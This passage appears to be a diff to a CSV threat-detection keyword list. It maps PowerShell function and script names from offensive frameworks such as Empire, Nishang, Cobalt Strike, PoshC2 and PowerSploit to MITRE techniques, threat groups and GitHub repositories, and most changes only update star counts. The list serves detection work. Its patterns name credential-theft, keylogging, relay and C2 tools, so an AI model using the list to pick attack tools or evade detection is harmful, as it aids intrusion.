Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-InveighRelay*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-InveighRelay.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1089","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-IR*","offensive_tool_keyword","Github Username","powershell forensic tools","N/A","N/A","N/A","N/A","Information Gathering","https://github.com/Invoke-IR","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*Invoke-IronCyclone*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*Invoke-JSRatRegsvr*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-JSRatRundll*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-JuicyPotato*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*invoke-kerberoast *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Invoke-IronCyclone*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*Invoke-JSRatRegsvr*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-JSRatRundll*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-JuicyPotato*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*invoke-kerberoast *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*invokekerberoast*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" "*Invoke-Kerberoast*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for Powerview/SharpView","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/PowerView3-Aggressor","1","1","N/A","10","10","125","39","2018-07-24T21:52:03Z","2018-07-24T21:16:10Z" -"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Kerberoast*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Kerberoast*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Invoke-Kerberoast.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Invoke-Keylogger.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-KrbRelay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-KrbRelay*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-LapsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-LapsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-LdapSignCheck*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-LdapSignCheck*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-LapsCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-LdapSignCheck*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-LdapSignCheck*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" "*Invoke-LocalAdminGroupCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-LocalAdminGroupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-Lockless*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Locksmith.ps1*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","472","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" -"*Invoke-LoginPrompt.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Invoke-LsaProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-LocalAdminGroupCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-Lockless*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Locksmith.ps1*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*Invoke-LoginPrompt.ps1*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Invoke-LsaProtectionCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" "*Invoke-LsaProtectionsCheck*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-MachineRoleCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2247","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" -"*Invoke-MalSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-MalSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*Invoke-MapDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-MachineRoleCheck*","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","2254","370","2023-09-03T15:14:46Z","2020-01-16T12:28:10Z" +"*Invoke-MalSCCM*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-MalSCCM*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-MapDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-Merlin.ps1*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 